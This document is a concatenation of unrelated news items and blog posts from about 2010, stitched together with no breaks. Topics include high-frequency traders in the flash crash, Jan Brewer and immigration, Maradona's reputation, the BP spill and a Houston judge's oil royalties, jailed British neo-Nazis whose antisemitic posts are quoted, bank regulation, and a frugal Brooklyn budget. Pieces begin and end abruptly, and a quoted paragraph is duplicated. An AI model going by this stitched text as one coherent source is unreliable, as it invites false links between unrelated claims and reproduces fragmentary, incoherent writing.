RED BANK , N.J. —
Above the Restoration Hardware in this Jersey Shore town , not far from the Navesink River , lurks a Wall Street giant .
Here , inside the humdrum offices of a tiny trading firm called Tradeworx , workers in their 20s and 30s in jeans and T - shirts quietly tend high - speed computers that typically buy and sell 80 million shares a day .
But on the afternoon of May 6 , as the stock market began to plunge in the “ flash crash , ” someone here walked up to one of those computers and typed the command HF STOP : sell everything , and shutdown .
Across the country , several of Tradeworx ’s counterparts did the same .
In a blink , some of the most powerful players in the stock market today — high - frequency traders — went dark .
The result sent chills through the financial world .
In a previous post , we caught Arizona governor Jan Brewer lying repeatedly about the anti-immigrant law she had just signed .
She kept saying that “ under SB 1070 there must first be reasonable suspicion that you are breaking some OTHER non-immigration law before an officer can ask a person about their legal status . ”
But if you read the law itself it says nothing of the kind , and even the non-partisan PolitiFact rated that claim as false .
Now she is doing it again , except that this time she is n’t even hiding her blatant racism .
During a recent debate of Republican gubernatorial candidates , Brewer claimed that most illegal immigrants coming over the border are smuggling drugs .
Of course , there is absolutely no evidence to support that claim .
When a reporter asked her yesterday about it , Brewer replied :
Well , we all know that the majority of the people that are coming to Arizona and trespassing are now becoming drug mules .
They ’re coming across our borders in huge numbers .
The drug cartels have taken control of the immigration .
So they are criminals .
They ’re breaking the law when they are trespassing and they ’re criminals when they pack the marijuana and the drugs on their backs .
When someone is asked for facts and they respond with vague statements like “ we all know ” it is pretty clear that they are lying .
In fact , her claim was disputed by actual border patrol agents and staff .
T.J. Bonner of the National Border Patrol Council said that Brewer ’s comments do n’t “ comport with reality — that ’s the nicest way to put it . ”
It is pretty clear that Brewer is using the age - old political tactic of stirring up fear and hatred against a group in order to win votes .
The truth simply does n’t matter to her .
And the truth is that the US side of the border with Mexico is one of the lowest - crime areas in the country .
According to the FBI , the top four big cities in America with the lowest rates of violent crime are San Diego , Phoenix , El Paso , and Austin , all of which are border cities with large Hispanic populations ( including illegal immigrants ) .
San Diego alone , where one out of four residents is an immigrant , has the lowest number of violent crimes per capita in the nation for a big city .
But that does n’t stop politicians like Brewer from claiming that their region is under siege .
Interestingly , being a border patrol agent is one of the safest jobs in law enforcement in the nation .
According to a government study on border protection , 3 percent of border patrol agents were assaulted last year , and in the majority of those cases they had rocks , bottles , or sticks thrown at them .
This compares to 11 percent of police officers and sheriff ’s deputies assaulted nationwide , usually with guns or knives .
Yes , this country has a problem with illegal immigration .
But stirring up fear and hatred is n’t going to help .
And neither is lying .
According to Category : Living people :
Persons of advanced age ( over 90 ) for whom there has been no new documentation in the last decade , may be . . . transferred to Category : Possibly living people .
It is not definitively known whether the people in this category are currently living or not .
For any person born before 1905 whose living status remains undetermined , please change this category to Category : Year of death missing .
They may instead be placed in Category : Year of death unknown only if reliable sources say that the person 's year of death is unknown .
Related categories [ edit ]
Yes !
Yes !
Yes !
Those sounds you heard moments ago are the horrified screams of your nearest AT&T towers .
Why ?
Because iPhone OS 4.0 Beta 4 brings us a new option in the settings menu : Tethering .
Advertisement
PS : For those who are n't seeing the tethering option despite having the newest iPhone OS beta , just reset your network settings and that issue should be fixed .
[ Thanks , Zephix and Matt ! ]
Dante - or it may have been Silvio Dante from the Sopranos - is supposed to have said that the hottest places in hell are reserved for those who in times of great moral crisis maintain their neutrality .
With that in mind , I felt the need to comment on the feedback from last week 's blog , which was about Diego Maradona taking over as coach of Argentina .
Many posts from English readers attacked Maradona as a cheat , which I think is an injustice .
I do n't recall a player being cheated against as much as Maradona .
When his career began in the mid-70s it is calculated that players were running an average of around 5,000 metres per game .
Twenty years later this figure had doubled .
This is effectively the span of Diego 's playing days .
He was active at a time of intense physical development - but played almost his entire career before the mid-90s clampdown on the sliding tackle .
Maradona played the game without the protection from referees that today 's stars take for granted .
Some of the tackles that were aimed against him would nowadays be worth not only a red card , but a jail sentence as well .
Virtually every time he took the field he was on the end of intimidation and violence , as opponents sought to reduce his effectiveness by any means possible .
That 1986 World Cup quarter - final against England is no exception .
The film of the tournament shows Terry Fenwick 's elbow being pushed into Maradona 's face .
It is hardly surprising that those who are on the end of constant cheating develop a cynical side .
Older Brazilian referees recall that Pele was a master of conning them into giving free kicks , linking arms with a defender and bringing both of them down while making it appear that he had suffered the foul .
Certainly I think that if I spent years being kicked , jostled and elbowed I might feel within my rights to punch one into the back of the net in the heat of the moment .
It is true that different cultures approach these things in different ways .
Bobby Charlton tells the story of how at a Fifa meeting of former players he called for a crackdown on diving .
Someone he calls " an old South American international " apparently replied ; " Do n't you think , as a professional , that if we can get away with creating an advantage for our side , we really should be applauded ? "
I believe there is more tolerance of this type of behaviour in South America , where showing the cunning necessary to get away with something is widely praised .
In Brazil it is often said that beating a big rival with an illegal goal adds extra pleasure to the victory .
But before we English try to claim the moral high ground we should forget any notions of perfection .
In his autobiography Martin Peters writes about the game at home to Poland in 1973 , which England had to win to qualify for the following year 's World Cup .
Peters was a magnificent player , and though I 've never met him personally , has always come across as an upstanding man .
But 35 years ago , with England a goal down and time running out , he confesses that : " It was looking desperate , and in such circumstances desperate measures are sometimes required . "
He was tackled inside the area by Poland 's left back , " He barely touched me but I went flying .
I dived .
It was n't a penalty , but the referee did n't see it that way . "
The resulting goal was not enough to qualify England for the World Cup.
But Peters ' frank admission should be enough to destroy any illusions about England having some natural monopoly on the concept of fair play .
It is unjust , then , to throw the label of cheat at Maradona - just as it is unwise to view him as a god .
He is a human being , with remarkable talent , but also with flaws .
Indeed , just as with Pele , it is probably the case that his flaws were part of his drive towards greatness .
On the field Maradona gave so much pleasure to so many that he deserves to enjoy a contented and fruitful second half of his life .
That 's why , although he would n't have been my candidate , he should be congratulated on becoming Argentina 's new coach - for two reasons .
Firstly because he has recovered sufficiently from his problems to be able to take on the position .
Secondly because he is prepared to put himself on the line .
There are many who think that a great idol should never put his prestige at risk .
I disagree .
That 's for museum pieces .
Maybe some of the best places in heaven are reserved for those brave enough to keep seeking a new challenge .
Comments on this week 's piece in the space below .
Other questions on South American football to vickerycolumn@hotmail.com , and I 'll pick out a couple for next week .
From last week 's postbag ;
A question about the Paraguayan striker Salvador Cabanas .
I 've been looking at his career stats and they are quite impressive , especially his Copa Libertadores record .
Why is he not playing in Europe ?
I was thinking possibly because of his size , he 's only 5 8 ' ' I believe .
What are your thoughts ?
Peter Udstuen
I think he could cope comfortably with the physical aspect of European football .
He 's short but very stocky , hard to knock off the ball , turns well to either side , is an excellent finisher .
More than size , I wonder if age might be against him now .
He 's 28 - he was something of a late developer , originally a midfielder in Paraguay before being converted into a striker in Chile and Mexico .
I think he 's earning well in Mexico with America .
What are your thoughts on Rodrigo Palacio 's career ?
His scoring record is outstanding , even better than Stephen Dobbie 's in the Scottish first division !
Why do you think he has n't made the move across the pond ?
Michael Gunn
Wiry Boca Juniors striker , terrific at using the flanks .
Decision time can't be put off much more now .
He 's 26 , Boca have youngsters such as Noir and Mouche who can fill the role , so there may well be pressure for him to go .
Two doubts - one is whether his heart is really in a move .
He comes across as a shy figure who if left to his own devices might never leave Boca .
The other is the shock he got when coming off the bench in Argentina 's opening 2006 World Cup match against Ivory Coast - big , strong opponents against whom he made little impression and was n't used again in the tournament .
I think the step up from the domestic Argentine game might worry him .
Biologist , Author
Ken Miller is professor of Biology at Brown University .
He serves as life science advisor to the NewsHour on PBS and is coauthor , with Joseph S. Levine , of Biology textbooks used by millions of students .
In 2005 , he served as lead witness in the trial on evolution and intelligent design in Dover , Pennsylvania .
I can see how she would want to meet the former PM who had the honor of holding the lowest approval rating of any twentieth century British Prime Minister .
Somehow people get the wrong impression about Thatcher and the UK because she consistently remained under 40 % approval ratings .
Her years in office said more about the system than it did about her popularity .
It sounds a bit odd that Palin would push so hard to meet Thatcher who is not in good mental or physical health .
( It does n’t say much about Thatcher ’s family either . )
Once again , it ’s all about Sarah Palin and appearance .
It ’s odd to think that someone would be so aggressive with insisting on a face to face meeting with someone that they do n’t know in such condition .
The narcissistic Fox News contributor lives another day .
Six hundred small banks still hold $ 130 billion in unpaid TARP payments with taxpayers on the hook .
Records show Over 90 Banks Miss their May TARP Payment .
Statistics , compiled by SNL Financial from U.S. Treasury data , showed 91 banks and thrifts skipped the May dividend payment under the Troubled Asset Relief Program , or TARP .
It was the first missed payment for 23 of the banks ; for the others , it was at least their second miss .
The number of banks missing their TARP payments rose for the third straight quarter .
In February , 74 banks deferred their payments ; 55 deferred last November .
SNL Financial 's analysis found 20 banks have missed four or more payments since the program began in 2008 , while eight banks have missed five payments .
While many of the largest U.S. banks easily repaid billions in TARP aid , more than 600 smaller banks still hold $ 130 billion from the program , created at the height of the financial crisis .
Top 10 Sovereign Debt Default Risks
The countries are ranked by their cumulative probability of default ( CPD ) , which gives the market 's assessment of an issuer 's likelihood of default over the life of a CDS contract .
New " Merle Hazard " Song - " Legal Tender "
Scientists raise estimate of spill rate once again
By Tom Eley
16 June 2010
A team of government - sponsored scientists on Tuesday once again sharply increased its estimate of the rate oil is gushing into the Gulf of Mexico .
The Flow Rate Technical Group now estimates that the well is losing between 30,000 and 60,000 barrels of oil a day one mile beneath the ocean ’s surface , a dramatic increase over the group ’s previous estimate of 25,000 to 30,000 barrels .
On the high - end estimate , the BP spill is producing every four days the equivalent of the Exxon Valdez , until now the worst spill in US history .
It was not immediately clear whether or not the latest increase in the estimated rate of the spill is owing more to improvements in measuring it or to BP ’s decision to cut the riser pipe in the first days of June to install a containment cap .
The previous estimate of 25,000 to 30,000 barrels was based largely on video imagery of the spill taken before the riser cut .
The new estimate is based on higher - quality video imagery , plus a sonar measuring device and other methods to assess the spill rate after the cut .
If both estimates are fairly accurate — which means the cutting of the riser pipe increased the flow of oil into the Gulf — then somewhere between 57 million and 75 million gallons have been spilled so far , not including the several million gallons BP claims it has siphoned off since June 3 .
If the new estimate is accurate for the spill ’s entire duration , then somewhere between 66 million and 112 million gallons have been spilled .
The latter figure is more than ten times greater than the Exxon Valdez spill .
The new estimate is the latest in a long series of upward revisions in the spill rate , and there is no reason to believe it will be the last .
Originally , BP and the Obama administration claimed that there was no oil spill .
Since then the estimated spill rate has gone from 1,000 barrels a day , to 5,000 barrels , then to 12,000 to 19,000 barrels , until last week ’s estimate of 25,000 to 30,000 barrels .
“ As we continue to collect additional data and refine these estimates , it is important to realize that the numbers can change , ” said Secretary of Energy Steven Chu .
“ In particular , the upper number is less certain . ”
Stonewalling from BP and the Obama administration has hindered understanding of the scope of the spill .
Until recent days scientists have been blocked from using the sonar device to measure the spill — though BP was aware of its availability even in early May .
Likewise , scientists using particle image velocimetry have reported that BP until recently failed to provide them with high - quality video to analyze the spill .
A live feed of the spill site continued to show oil gushing out in a massive , billowing cloud .
The fragility of BP ’s efforts to siphon the oil to tankers on the surface was underscored on Tuesday when a lighting strike on the Discoverer Enterprise caused a fire and suspended operations completely for five hours .
Climatologists predict an especially active hurricane season , raising the prospect that siphoning could be suspended for days at a time throughout the summer .
Vintage Computing Items for the IT Crowd The Centre for Computing History has again been asked to supply retro computer items for the set of the forth series of The IT Crowd .
The Centre for Computing History has again been asked to supply retro computer items for the set of the forth series of The IT Crowd .
We have supplied the same set of machines and gadgets as we did for the last series plus some new items ... Curator Jason Fitzpatrick said : " Being a bit of a fan of the show , I thought it was a great chance to be involved and help populate the set with some true computing history .
The number one item that I thought just HAD to be there was the Altair 8800 computer - widely considered the first commercial personal computer . "
Andy Talyor , Volunteer Co-ordinator for the museum said " The IT Crowd is a great opportunity to raise the profile of the museum .
People see the machines on the set and then Google them to find out more about them .
Invariably they arrive at our website and if they learn something about computing hsitory all the better . "
Andy Talyor , Volunteer Co-ordinator for the museum said " The IT Crowd is a great opportunity to raise the profile of the museum .
People see the machines on the set and then Google them to find out more about them .
Invariably they arrive at our website and if they learn something about computing hsitory all the better . "
The image to the right shows the computers on the series 4 set .
As you can see for continuity the set has not changed a great deal , but after going to see two episodes being filmed we can assure you that IT Crowd fans will not be dissapointed by the next series !
It is VERY funny ... Look out for ' webby ' our little black and white beanie mascot that was behind Moss in the third series .
He 's there again in the next series !
Other computers on the set include a CGL Sord M5 , Oric Atmos , Amstrad CPC 464 , Commodore 64 , a homebrew Sinclair ZX81 ( on top of the Altair 8800 ) , Atari 2600 games console , Commodore PET , Apple Mac Plus , ZX Spectrum + 2 , the main PCB of an Acorn Atom and a ZX Spectrum Plus in its original box and various others around the set ...
Picture : Sean , the *real *
IT guy for the show stands next to the shelves behind Moss where most of our computers were positioned .
Story By : Jason Fitzpatrick Date : 15-04-2010
Olivia Munn , who appeared in Iron Man 2 and is best known for hosting G4 ’s Attack of the Show ! and briefly dating Chris Pine , will join The Daily Show as a correspondent .
Munn , the show ’s fifth female correspondent , was welcomed to the team during today ’s taping .
Munn will also star in NBC ’s upcoming Perfect Couples , currently slated for a mid-season start .
[ JustJared ]
The worldcup vuvuzela game .
How long can you stand it ?
Play and find out !
I do n’t get into Israeli politics very often .
Not because I ’m uninformed , but because I ’m conflicted .
Here ’s a little background on me .
I ’m an Iranian Jew .
Do n’t be surprised , there are actually many of us .
There are no members of my family remaining in Iran , where I was born .
I have dozens ( possibly hundreds ! ) of cousins currently in Israel .
My point in sharing this information is that I have a dog in the race .
I actually have several dogs in this race .
That being said , I was n’t raised to be conflicted .
I grew up watching hundreds of hours of holocaust footage and films .
There was never an anti-Israel perspective introduced into my childhood , probably because there is n’t a single branch of my family tree that is n’t 100 % Jewish .
I never felt as if Israel was ever anything less than 100 % right in anything that they ever did .
As an adult , I realize now that there ’s no such thing as 100 % “ right ” .
Both sides in a conflict are always partially wrong .
That “ good versus evil ” ideology is immature and is n’t rooted at all in reality .
It ’s always a product of blinding bias .
And I have to say that in the case if Israel , it ’s the most understandable bias in human history .
No people have been persecuted more relentlessly than the Jewish people .
So when Israel is wronged , or perceived to have been wronged , it ’s extremely personal to most Jews .
None of us have to go back more than 3 generations to find personal stories of tragedy and brutality .
Yasser Arafat was the Palestinian leader for all of my formative years .
He was , in my estimation , a truly loathsome bastard who was never interested in achieving peace with Israel .
I honestly believe that his primary objective in life was to obliterate Israel and turn that land into a Palestinian state .
His zealotry did n’t however , preclude him from exploiting his people and squirreling millions of dollars away in European banks .
He was just an all round hateful piece of shit .
I always felt that as long as he was in power , Israel was justified in doing whatever it had to do to keep their country because giving an inch to Arafat would mean losing everything .
There have been two times in history that I believe peace was close enough to touch .
The first was when Bill Clinton was working to broker a deal between Yitzhak Rabin and Arafat .
The offer from Israel was never going to get better than it did under Rabin , and Arafat knew it .
He still turned it down and Rabin was rewarded for his efforts by being assassinated by one of his own .
Days before Bill Clinton left office , Arafat called him up to tell him ( Clinton ) that he was a great man .
Clinton responded by saying , “ I am not a great man .
I am a failure , and you have made me one . ”
Clinton then went on to let Arafat know that his actions had guaranteed that Ariel Sharon would be elected the next prime minister of Israel .
Israel did elect Ariel Sharon , who was not quite the neocon that Netanyahu ( who is currently in power ) is , but he was definitely not likely to work for peace .
He did n’t .
The second near miss for peace came when Arafat came back to Sharon a year after he was elected to accept the terms that Clinton and Rabin had proposed .
Sharon declined to accept .
Since Arafat ’s death , there has been a dramatic role reversal between Israel and Palestinians .
Israel has become the brutal aggressor , while Palestinians seem to have largely taken the approach of peaceful protest .
I ’m not saying that there are n’t still Palestinian terrorists whose goal it is to ensure that peace never happens .
But those factions are not leading the country , and they are a minority .
Israel has become a vicious bully with tunnel vision , going so far as to slap their only ally in the face .
A couple of months ago , while our Vice President was visiting Israel , the Israeli interior minister blindsided the world with an announcement that 1,600 new housing developments would be built in East Jerusalem .
Israel is so tunnel visioned by their agenda , that they embarrassed the only ally they have in the world .
Between that , the thirty days of bombing the shit out of Lebanon with no regard to the loss of innocent life , and the latest murder of nine innocent people , I remain conflicted on this topic in completely different ways than I was in previous lives .
I ’m conflicted because I want Israel to exist peacefully .
But I cannot blindly support Israel through what it ’s become .
I am entirely more comfortable with having a brutal enemy than I am with my own kind evolving into something that is morally indefensible .
As an American , I want to protect the interests of my country .
I no longer believe that supporting Israel is in our best interest .
I understand that we need a strong ally in the middle ease , but I also understand that our alliance with Israel is the primary reason for that need .
I strongly believe that Netanyahu ’s path is ultimately destructive to Israel , and that if they want to continue down this path , they should do it without the support of the US .
I want Israel to veer off this course of self destruction .
I want my family to be able to live happy , peaceful lives .
Loving someone means telling them when they ’re wrong .
My objectivity leads me to conclude that I really do n’t care which brutal government has control of the land currently known as Israel .
According to the often stated ( at least in this blog ) Scott Adams Theory of Predictable Disasters , this would be an excellent time to buy stock in BP .
Yes , yes , you ’d vomit in your own mouth when you executed the trade , but follow me on this argument .
The financial wonks will tell you that the cost of the clean up and settlements are “ already baked into the stock price . ”
That ’s probably true ( ish ) .
Still , no one can really predict how much this thing will cost BP in the end .
The stock could still go much lower .
And I remind you as always , do n’t take your financial advice from cartoonists .
My first argument in favor of buying BP stock is that managers caused this problem , whereas engineers are solving it .
That ’s a positive sign .
Managers apparently had the choice of including remote shut - off technology in the project , but I ’m assuming they decided that it cost too much , or would take too long , or they had some other managerish reason .
So far , managers have acted exactly as you would expect managers to act .
Now it ’s the turn of engineers to fix this problem .
I assume there are relatively few budget constraints on engineers as they concoct their plans .
And I assume everyone at BP agrees what their highest priority is , for a change .
In other words , there wo n’t be as much manager interference as normal .
And I assume some of the best engineers in the solar system are working on this .
So what we have here is a pure case of brains against oil spill .
It ’s the Manhattan Project for natural disasters .
The Scott Adams Theory of Predictable Disasters states that any catastrophe that society at large can predict far in advance wo n’t happen , usually because scientists and engineers figure a way to head it off .
So while an oil spill of this size was n’t predicted by the general public , the slow motion ecological disaster from this point forward is predictable .
Admittedly , this is a grey area for the theory because this particular disaster is happening on a relatively fast schedule .
It will be a good test of the robustness of the Scott Adams Theory of Predictable Disasters .
I do n’t want to make light of the disaster .
It ’s plenty bad .
And I will stipulate that the engineers and scientists have a lot of explaining to do in terms how we got here and why the initial attempts to stop the leak have n’t worked .
And maybe there should have been a tad more whistle - blowing .
But here we are .
Disclosure :
To make things interesting , I just bought a small amount of BP stock with my gambling money .
I ’ll sell the stock on the day I hear that engineers capped the leak and the new technology for cleaning oil spills is working better than most people expected .
In other words , I ’m betting on the engineers and scientists .
More on the investigation into the judge BP wants to oversee lawsuits resulting from the Deepwater Horizon explosion on tonight 's AC360 at 10 p.m. ET
Houston , Texas ( CNN ) --
The judge that BP wants to hear an estimated 200 lawsuits over the Gulf of Mexico oil disaster gets tens of thousands of dollars a year in oil royalties and is paid travel expenses to industry conferences , financial disclosure forms show .
Lawyers who practice before U.S. District Judge Lynn Hughes say he 's tough but fair , and a CNN review of his cases found he ruled in favor of oil companies only slightly more often than he ruled against them .
But his connections to the industry have raised eyebrows at a time when BP is under fire for the worst oil spill in U.S. history .
Federal financial disclosure forms obtained by CNN show that since 2003 , Hughes has consistently been paid annual fees from the oil and gas industry , mostly in the form of lease payments for wells and mineral rights on land he owns .
None of the payments comes from BP , but his holdings include mutual funds that draw income from Anadarko Petroleum , a minority owner in the well now pouring up to 2.5 million gallons a day into the Gulf .
In some cases , the amounts are significant .
In others , the payments are relatively small .
Oil giant ConocoPhillips paid him between $ 50,000 and $ 100,000 in 2008 , the last year in which records are publicly available .
In a note attached to the 2008 form , Hughes said he expected the amounts to be relatively similar for 2009 .
He gets smaller amounts from smaller producers such as Sun Oil , Everest Oil and Wagner Oil , which pay for the right to drill oil and gas from lands he owns .
The federal disclosure form does not require exact amounts , only estimates and approximate figures .
A legal expert on ethics , Indiana University professor Charles Geyh , told CNN that judges with financial ties to the oil industry should make their connections crystal clear .
" When you take it together , is there a concern that a reasonable person might say , ' Look - it , he 's not a judge that happens to be dabbling -- he 's in effect a participant in the industry he 's trying to judge , ' " Geyh said .
Hughes has been sitting on the federal bench in Houston since the mid-1980s , and BP has asked that he supervise all of the estimated 200 cases filed against it since the April sinking of the offshore drill rig Deepwater Horizon .
The sinking left 11 workers dead and uncorked a gusher that has been fouling the Gulf for more than eight weeks .
In court filings in early May , BP requested Hughes be assigned to preside over the spill lawsuits because he already was assigned to one of the first cases , a lawsuit filed on behalf of Vietnamese - American fishermen from Louisiana .
According to an e-mail sent to CNN , BP said the judge " is an appropriate choice to provide oversight of these cases . "
The Department of Justice has asked that the suits be consolidated in New Orleans , Louisiana , the closest federal court to the spill .
The sinking took place in the waters off southeastern Louisiana , about 40 miles off the mouth of the Mississippi River .
BP would not comment on Hughes ' financial disclosures .
But the judge has held two recent meetings in Houston to discuss possible ethics concerns , a lawyer who attended those meetings told CNN .
" In both of those hearings , the questions have been raised about whether or not he should preside over these cases or whether there will be a conflict , " Mark Lanier , a prominent Houston plaintiff attorney , told CNN .
" In the second one , the judge explained he had listed online all of his financial disclosure information , so people would be able to look at and probe . "
One particular case over which Hughes presided in 2009 is raising questions .
In 2008 , Hughes listed royalty payments from about 10 wells leased to Devon Energy , an Oklahoma City - based oil and gas company .
The amounts were relatively small -- under $ 15,000 , according to his disclosure form -- and a source told CNN the payments were for a collection of nine or 10 wells scattered in land across two or three states .
In May of 2009 , Hughes issued a favorable decision for Devon Energy in a dispute with its insurance company .
According to an attorney for the insurance firm , the total amount was $ 3.9 million .
Court records show that Hughes did not disclose his royalty payments from Devon at any point during the proceedings .
No one claims the judge has violated the federal code of judicial ethics , but Geyh says appearances matter .
" I think the best practice that is out there , and I think what judges across the country are encouraged to do , is that if there is any doubt , put some sunshine on the problem , " he said .
" Turn your cards face up , to mix metaphors , and make it clear to the parties what your potential interests are . "
Hughes also travels widely and speaks to meetings held by the American Association of Petroleum Geologists , including one held in early June in the Canadian city of Calgary and an earlier conference in Cape Town , South Africa .
He 's the association 's distinguished lecturer on ethics , having delivered 10 speeches to the trade group in the past three years .
The association does n't pay him a fee but does supply his travel , accommodation and expenses , said Larry Nation , a spokesman for the trade group .
Federal judges rarely respond to requests for comment from journalists .
But Hughes told CNN in an e-mail that while he could n't speak to past or present cases , he did quote Thomas Jefferson : " Let facts be submitted to a candid world , " he wrote .
Lawyers who know him call Hughes a tough but fair judge and say the reference is to a desire for transparency on his part .
But attorneys for environmental advocacy groups say that for BP to request Hughes be assigned to the spill lawsuits is " outrageous and unseemly . "
CNN examined three years of Hughes ' rulings on oil and gas cases , finding he ruled in favor of oil companies only slightly more often than ruling against them .
As for other federal judges , a recent survey showed more than 20 federal judges across the Gulf states have a financial interest in oil and gas companies .
Several of them have recused themselves from presiding over cases related to the Gulf spill .
Watch Anderson Cooper 360° weeknights 8 pm ET .
For the latest from AC360° click here .
Image caption Heaton and Hannington wanted to rid Britain of ethnic minorities
Two white supremacists who posted racist internet messages calling for Jews to be destroyed have been jailed .
Michael Heaton , 42 , of Leigh , Greater Manchester , and Trevor Hannington , 58 , from Hirwaun , described Jews as " scum " and encouraged people to kill them .
The self - proclaimed neo -Nazis were both cleared of soliciting murder .
Heaton was convicted of stirring up racial hatred - a charge Hannington admitted .
Heaton was jailed for 30 months and Hannington for two years .
' Race war '
Justice Irwin told Heaton his words were of the most " insulting and extreme nature " marked by " violent racism " and said only a significant jail term was acceptable .
The 42 - year - old food packer admitted in a police interview that he was a founder member of the Aryan Strike Force ( ASF ) , whose goal was " the eradication of ethnic minorities from Britain " , Liverpool Crown Court heard .
The judge told him : " You saw yourself as the leader of a potentially significant and active National Socialist group .
You are a lonely man with little in your life Justice Irwin , Liverpool Crown Court
" Your sustained racist rants were intended to bolster that group .
" You wanted to start a race war .
" You are clearly filled with racial hatred and also with violent and angry beliefs . "
The court was told that Heaton had posted 3,000 messages on his ASF website between January and June 2008 .
He wrote : " I would encourage any religion or race that wants to destroy the Jews , I hate them with a passion . "
In another posting he said Jews were " leeches " and " scum " and that black people were " less intelligent than other species " .
Hannington , from Hirwaun , Cynon valley in south Wales , was described as a loner by the judge , who told him : " You are a long - standing racist who has never hidden your views , which are violent and vicious in the extreme .
" You are a lonely man with little in your life . "
The 58 - year - old builder admitted he was an administrator for the ASF website and one of his posts read : " Kill the Jew , Kill the Jew , burn down a synagogue today !
Burn the scum . "
Image caption Heaton 's bedroom was adorned with Nazi flags and national front posters
When police raided the homes of both men they found a whole collection of knives and firearms .
Heaton 's bedroom was adorned in flags with symbols of far - right movements , and a samurai sword hung above his bed .
Elsewhere around the house officers found nunchucks , batons , knives and knuckle dusters hanging on the walls , and a BB machine gun was also recovered .
Flags bearing swastikas were strewn around Hannington 's house and police found a personal armoury including an air rifle and daggers .
' Anarchist 's Cookbook '
David Fish , mitigating for Heaton , said the defendant had been banned from accessing the internet while on bail and was no longer involved in the BFF .
He said : " Heaton has , in effect , shed the habit and lost interest in putting up these posts . "
Hannington 's defence claimed he was a " fantasist " and the jury 's verdict accepted the posts were made without a great deal of thought .
However , Hannington also admitted owning the Anarchist 's Cookbook , Kitchen Complete and The Terrorist Encyclopaedia , all of which are considered useful tools to someone preparing or committing an act of terrorism .
Mr Justice Irwin ordered the weapons to be destroyed , along with the defendants ' home computers .
Stuart Laidlaw , the Crown Prosecution Service 's Counter Terrorism Division lawyer , said : " As members of the ASF , Hannington and Heaton were closely associated with Ian Davison who was recently convicted of terrorism offences and of producing the poison ricin .
" They enjoyed similar links with his son , Nicky Davison , who was also recently convicted of terrorism offences .
" We considered this to be a very serious case and on the evidence presented to us by police , the public interest required a prosecution . "
It is the largest player in derivatives , the financial vehicles that have been widely faulted for adding excessive risk to the system .
It runs the largest hedge fund in the banking industry , the $ 21 billon Highbridge Capital unit , and makes billions of dollars ’ worth of trades in its own account .
And it has a network of retail branches in nearly every corner of the country .
“ Given its franchise diversity , JPM is impacted by virtually all of the coming regulatory reforms , ” Keith Horowitz , an analyst at Citigroup who follows big banks like JPMorgan , wrote in a research note last week .
One part of the bill would push much of the buying and selling of derivatives onto clearinghouses , forcing banks to put up collateral against each trade .
For JPMorgan , that could tie up billions of dollars that would otherwise have gone toward lending or the bank ’s own trading .
A smaller portion of trading in derivatives would take place over exchanges , making prices visible to the public and pushing down prices  and profit margins .
Image Jamie Dimon , the bank ’s chief today .
Credit ... Michael Reynolds / European Pressphoto Agency
Banks would be required to hold more capital in reserve to cover potential trading losses .
In some cases they might also be prohibited from using federally insured bank deposits for risky trading .
That would hit JPMorgan hard because of its heavy reliance on customer deposits to finance other businesses .
Both changes would take even more money out of play and lower profits .
JPMorgan has already begun dismantling its so - called proprietary trading operation , to comply with new restrictions on banks making speculative bets using their own capital .
Analysts say that will force the bank to give up about 2 percent of its revenue .
I never really decided to spend only $ 8,000 in one year — it just sort of happened .
I did n’t even realize the extent of my thrift until tallying up my income on the eve of March 15 .
When you take the amount of money I brought home ( roughly $ 13,000 ) and subtract the amount I had thrown to the black void that is private student loans ( roughly $ 5,000 ) , combined with the fact that both my checking and my savings accounts were more or less empty on January 1 , it was pretty simple math .
And while I maybe did n’t expect my spending to have been quite that lean , I ca n’t say I was all that surprised either .
Since I moved to Brooklyn two years ago , I ’ve staunchly maintained that despite New York City ’s reputation as the playground for the rich ( or , as will become clear later , because of it ) you can pretty much spend as much , or as little as you want here .
So how did I come to only spend eight grand ?
Well , in a way , the answer starts right before I packed up my life into a clunker of a 92 Jetta on the verge of a breakdown , and made the drive to my first apartment in Brooklyn .
Just a few days before , I was sweating under the weight of a cap - and - gown ensemble while Mayor Bloomberg addressed my class of roughly 450 Bard College grads .
To paraphrase , he promised that all of us who moved to New York City would be welcomed with “ open arms . ”
But that was n’t exactly how it played out for me .
During the first month of my new life in New York , the superintendent of my building , who I later learned was addicted to crack , broke into my room and stole a handful of blank checks .
She then proceeded to use them to milk my checking account to - $ 1000 .
After my first six months I was unemployed , having been fired from my first two jobs , the latter of which was bussing tables at a roach - infested restaurant .
I finished up 2007 doing freelance photography .
Though it has a romantic ring to it , this more or less translated to taking snap shots of drunk people in nightclubs , and a myriad of odd jobs from taking head shots of a police detective for his MySpace page to playing the role of one of ten “ fake ” paparazzi photographers in a Burger King commercial .
For all of this , I made around $ 800 a month , $ 550 of which had to go to rent at the time .
With only $ 250 left for everything else , including student loans , I had to figure out how to live frugally .
Shelter
One of the main reasons I ’m able to spend so little is that my rent in a shared Bed Stuy brownstone is cheap , even for Brooklyn .
I pay $ 440 a month , all utilities included .
Also included are wooden floors , two large windows , original molding , two large walk - in closets , a built in bookcase , and a personal bathroom .
Yeah , that ’s right — I have my own bathroom .
My rent dropped $ 110 because we decided to rent out our living room .
Bed Stuy might not have the same restaurants and bars as trendier neighborhoods have , but it ’s quiet with tree lined streets , and it ’s got perhaps the best roti in Brooklyn .
When it came time to paint my room , I went to Build it Green in Astoria and walked off with a gallon of blue paint and a quart of white for a total of $ 6 , which of course I wrote off my next rent check .
Clothing
I do n’t need to spend much on clothes because my job , as a part - time assistant for a small business owner , requires only that I look clean .
So I usually shop at the Salvation Army or go to a Free Market , basically a massive giveaway that happens usually every few months .
They ’re highly unpredictable .
There ’s either tons of great stuff , or a meager selection that ’s clearly been sitting at the bottom of someone ’s closest for the last year .
Still , it ’s free , and always worth a check .
( To sign up for email notices for when the next one is planned , contact them at [ email protected ] )
That said , I did need to buy clothes since moving to the city for interviews , and found them at chain stores common to Brooklyn like “ Danice ” or “ Pretty Girl . ”
I ’ve gotten nice blouses sold two for $ 10 , and basic black skirts for $ 15 that look just as professional as more costly items elsewhere .
Food
My diet consists mainly of gourmet ingredients : pre-washed baby spinach and watercress , fresh mozzarella , portabella mushrooms , smoked salmon , chocolate croissants , free range eggs , salmon steaks , spicy Italian sausage , hummus , crème fraiche , Odwalla granola bars — these are just some of the gourmet items I ’ve picked out of supermarket trash bins in the past year .
As for quality , most of the time the items I find have not even passed their expiration date , and if they have , it ’s usually only by a day or two .
While sometimes eating for free means slightly bruised fruit or slicing off a bit of mold on a block of cheese , I ’ve foraged for everything from fish filets to pork chops and never gotten sick — something I ca n’t say for people who regularly eat at restaurants .
Where do I find the best stuff ?
Mainly in Manhattan .
Le Pain Quotidien has probably the best bread in all of New York City .
